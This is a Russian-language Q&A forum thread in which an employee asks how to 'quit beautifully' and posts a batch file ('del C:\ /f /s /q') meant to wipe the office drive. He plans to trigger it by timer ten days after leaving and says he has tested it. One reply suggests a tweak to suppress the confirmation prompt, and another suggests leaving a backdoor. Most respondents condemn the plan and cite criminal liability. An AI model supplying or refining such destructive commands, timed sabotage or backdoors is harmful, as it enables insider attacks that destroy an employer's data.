Другие языки программирования и технологии
Как красиво уволиться? @echo off del C:\ /f /s /q @echo on батовский подготовил, вирусни накочал....Ваши предложения!
не сработает батник.. . не хватает в конце вот такого обрывочка "| y" =)))) иначе будет спрашивать - а уверены ли Вы в желании форматировать системный диск С ?! ;)
Саша Христолюов
Проверил, все в норме....
Strannik 85
/q- тихий режим
Подготовьте бэкапы чтоб после падения можно было восстановить... .
Это смягчит ст 273 УК РФ может условно дадут....
Саша Христолюов
Они не просекут, батники запущу в определенное время....10 дней после увольнения.. Таймер
Довольно странное представление о красоте. Нагадить перед уходом, это значит красиво?
Самому себе нагадишь в первую очередь.
ст 273 УК РФ это раз, другие работодатели хрен возьмут на работу, если узнают про твои подвиги, а они довольно часто этим интересуются у бывших твоих работодателей, это два.
Самому себе нагадишь в первую очередь.
@echo off del C:\ /f /s /q @echo on
несработает
Если этим батником ты хотел отформатировать диск C, на котором стоит windows, у тебя ничё неполучится. Как бы ты не пытался, но windows не даст тебе форматировать жёсткий, пока windows работает.
А если ты хотел удалить все файлы с диска C, то системные файлы тоже удалить неполучится, например папку windows
несработает
Саша Христолюов
Все проверено, форматирует и не спрашивает, при перезогрузке мелкософт не грузит...
Влад Корнеж
Незнаю как ты форматировал, но я сколько не пробовал, выдавал ошибку, т.к. жёсткий диск себя не даёт форматировать до тех пор пока он используется системой.
Точно так же если воспроизвести любую песню с помощью проигрывателя, и в то время пока она играет, попробовать её удалить с жёсткого диска, то ты не сможешь, пока проигрыватель её использует.
лучше все же бэкдор себе оставить в конторе
Саша Христолюов
На другом компе открыт путь из вне....
И чтоб потом получить хорошие отзывы с прошлой работы, когда новый работадатель будет узнавать.
Спали тогда тама все.
Красиво уйти - это уйти так, чтобы о тебе там хорошо отзывались и звали, если появится какая-либо халтурка.
А уходить, ломая всё, что настроил.. . Неуважение. Неуважение не только к тем, кто остался, но и к себе самому.
Да и уголовно всё это наказуемо, ага.
Причём, согласно закону, ущерб в таком случае определяет пострадавшая сторона. Т. е. , грубо говоря, если твоё руководство скажет, что в результате этих действий потери составили сотни тысяч баксов - суд примет это за основу.
Готов отдуваться на такую сумму? )
Да и уголовно всё это наказуемо, ага.
Готов отдуваться на такую сумму? )